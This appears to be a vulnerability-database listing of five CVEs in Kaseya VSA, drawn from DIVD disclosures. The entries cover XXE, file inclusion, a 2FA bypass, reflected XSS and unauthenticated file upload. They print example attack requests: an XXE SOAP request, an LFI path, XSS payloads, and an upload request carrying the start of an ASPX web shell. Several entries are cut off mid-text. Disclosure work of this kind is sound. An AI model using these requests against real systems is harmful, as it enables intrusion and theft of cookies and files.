CVSS: 7.5EPSS: 0%CPEs: 1EXPL: 1CVE-2021-30201 – Unauthenticated XML External Entity vulnerability in Kaseya VSA < v9.5.6
https://notcve.org/view.php?id=CVE-2021-30201
The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:kas="KaseyaWS"> <soapenv:Header/> <soapenv:Body> <kas:PrimitiveResetPassword> <!--type: string--> <kas:XmlRequest><![CDATA[<! • https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure https://csirt.divd.nl/CVE-2021-30201 https://csirt.divd.nl/DIVD-2021-00011 https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021 • CWE-611: Improper Restriction of XML External Entity Reference •
CVSS: 6.5EPSS: 0%CPEs: 1EXPL: 1CVE-2021-30121 – (Semi-)Authenticated local file inclusion in Kaseya VSA < v9.5.6
https://notcve.org/view.php?id=CVE-2021-30121
Semi-authenticated local file inclusion The contents of arbitrary files can be returned by the webserver Example request: `https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\Kaseya\WebPages\dl.asp` A valid sessionId is required but can be easily obtained via CVE-2021-30118 Inclusión de archivos locales semiautenticados El contenido de archivos arbitrarios puede ser devuelto por el servidor web Ejemplo de solicitud: `https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\Kaseya\WebPages\dl.asp` Se requiere un SessionId válido pero puede ser fácilmente obtenido a través de CVE-2021-30118 • https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure https://csirt.divd.nl/CVE-2021-30121 https://csirt.divd.nl/DIVD-2021-00011 • CWE-829: Inclusion of Functionality from Untrusted Control Sphere •
CVSS: 9.9EPSS: 0%CPEs: 1EXPL: 0CVE-2021-30120 – 2FA bypass in Kaseya VSA <= v9.5.6
https://notcve.org/view.php?id=CVE-2021-30120
Kaseya VSA before 9.5.7 allows attackers to bypass the 2FA requirement. The need to use 2FA for authentication in enforce client-side instead of server-side and can be bypassed using a local proxy. Thus rendering 2FA useless. Detailed description --- During the login process, after the user authenticates with username and password, the server sends a response to the client with the booleans MFARequired and MFAEnroled. If the attacker has obtained a password of a user and used an intercepting proxy (e.g. • https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure https://csrit.divd.nl/CVE-2021-30120 https://csrit.divd.nl/DIVD-2021-00011 • CWE-669: Incorrect Resource Transfer Between Spheres •
CVSS: 5.4EPSS: 0%CPEs: 1EXPL: 1CVE-2021-30119 – Authenticated Authenticated reflective XSS in Kaseya VSA <= v9.5.6
https://notcve.org/view.php?id=CVE-2021-30119
Authenticated reflective XSS in HelpDeskTab/rcResults.asp The parameter result of /HelpDeskTab/rcResults.asp is insecurely returned in the requested web page and can be used to perform a Cross Site Scripting attack Example request: `https://x.x.x.x/HelpDeskTab/rcResults.asp?result=<script>alert(document.cookie)</script>` The same is true for the parameter FileName of /done.asp Eaxmple request: `https://x.x.x.x/done.asp?FileName=";</script><script>alert(1);a="&PathData=&originalName=shell.aspx&FileSize=4388&TimeElapsed=00:00:00.078` XSS reflexivo autenticado en HelpDeskTab/rcResults.asp El parámetro result de /HelpDeskTab/rcResults.asp se devuelve de forma insegura en la página web solicitada y puede utilizarse para realizar un ataque de Cross Site Scripting Ejemplo de solicitud: `https://x.x.x.x/HelpDeskTab/rcResults. asp?result=` Lo mismo ocurre con el parámetro FileName de /done.asp Petición de ejemplo: `https://x.x.x.x/done.asp?FileName="; • https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure https://csirt.divd.nl/CVE-2021-30119 https://csirt.divd.nl/DIVD-2021-00011 • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVSS: 10.0EPSS: 0%CPEs: 1EXPL: 1CVE-2021-30118 – Unauthenticated Remote Code Execution in Kaseya VSA < v9.5.5
https://notcve.org/view.php?id=CVE-2021-30118
An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring & Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 <%@ Page Language="C#" Debug="true" validateRequest="false" %> <%@ Import namespace="System.Web.UI.WebControls" %> <%@ Import namespace="System.Diagnostics" %> <%@ Import namespace="System.IO" %> <%@ Import namespace="System" %> <%@ Import namespace="System.Data" %> <%@ Import namespace="System.Data.SqlClient" %> <%@ Import namespace="System.Security.AccessControl" %> <%@ Import namespace="System.Security.Principal" %> <%@ Import namespace="System.Collections.Generic" %> <%@ Import namespace="System.Collections" %> <script runat="server"> private const string password = "pass"; // The password ( pass ) private const string style = "dark"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); <snip> ``` The attacker can control the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter. Even though the call requires that a sessionId cookie is passed we have determined that the sessionId is not actually validated and any numeric value is accepted as valid. • https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure https://csirt.divd.nl/CVE-2021-30118 https://csirt.divd.nl/DIVD-2021-00011 https://helpdesk.kaseya.com/hc/en-gb/articles/360019054377-9-5-5-Feature-Release-10-April-2021 • CWE-434: Unrestricted Upload of File with Dangerous Type •